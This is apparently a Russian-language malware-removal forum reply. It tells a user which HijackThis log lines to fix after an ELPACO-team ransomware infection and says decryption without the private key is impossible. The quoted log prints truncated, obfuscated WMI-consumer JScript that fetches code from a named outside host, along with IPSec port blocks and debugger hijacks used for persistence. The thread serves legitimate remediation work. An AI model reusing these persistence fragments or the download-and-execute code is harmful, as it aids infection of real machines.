Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:
Код:
O4 - HKLM\..\Run: [systemsg] = C:\Users\admin\AppData\Local\1BCB5402-B625-DF8D-10F9-848460144A65\systemsg.exe (file missing)
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Games (empty)
O23 - Driver S1: ushrcquj - C:\Windows\system32\drivers\ushrcquj.sys (file missing) (+safe mode)
O25 - WMI Event: __gconsumer1 - __gfilter1 - var e,r,n,s,c,l,o=3000,p="htt"+"p:/"+"/w.gem"+"lab.top/x64/k.txt";for(s=new ActiveXObject("Micro"+"soft.XM"+"LHTTP"),x=new ActiveXObject("Scri"+"pting.Fil"+"esystemObject"),l=new ActiveXObject("WSc"+"ript.S"+"hell"),s.open("GET",p,!1),s.send(),q=s.responseText,r=q.split("\r\n"),i=0;i<r.length;i++)if(883 bytes)
O25 - WMI Event: __StagingConsumer - __StagingFilter - function s(e){var t=new ActiveXObject("ADODB.Stream");t.Type=1,t.Open(),t.Write(e),t.Position=0,t.Type=2,t.CharSet="UTF-16LE";var n=t.ReadText(),r=[];for(var i=0;i<n.length;i++){var s=n.charCodeAt(i);r.push(s&255),r.push(s>>8&255)}return r}function o(e){var e=s(e),t=e.slice(0,32),n=e.slice(32),r="";(1207 bytes)
O25 - WMI Event: __StagingConsumer - __StartupFilter - Event="__InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320", function s(e){var t=new ActiveXObject("ADODB.Stream");t.Type=1,t.Open(),t.Write(e),t.Position=0,t.Type=2,t.CharSet="UTF-16LE";var n=t.ReadText(),r=[];for(var i=0;i<n.length;i++){var s=n.charCodeAt(i);r.push(s&255),r.push(s>>8&255)}return r}function o(e){var e=s(e),t=e.slice(0,32),n=e.slice(32),r="";(1207 bytes)
O26 - Debugger: HKLM\..\CompatTelRunner.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\logoff.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\perfmon.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchApp.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchIndexer.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchProtocolHost.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\shutdown.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\taskkill.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\tasklist.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\taskmgr.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\wsqmcons.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
Выложите в архиве записку о выкупе и пару зашифрованных файлов. Но, судя по имени файла Decrypt_ELPACO-team_info.txt по данному вымогателю без приватного ключа расшифровка невозможна.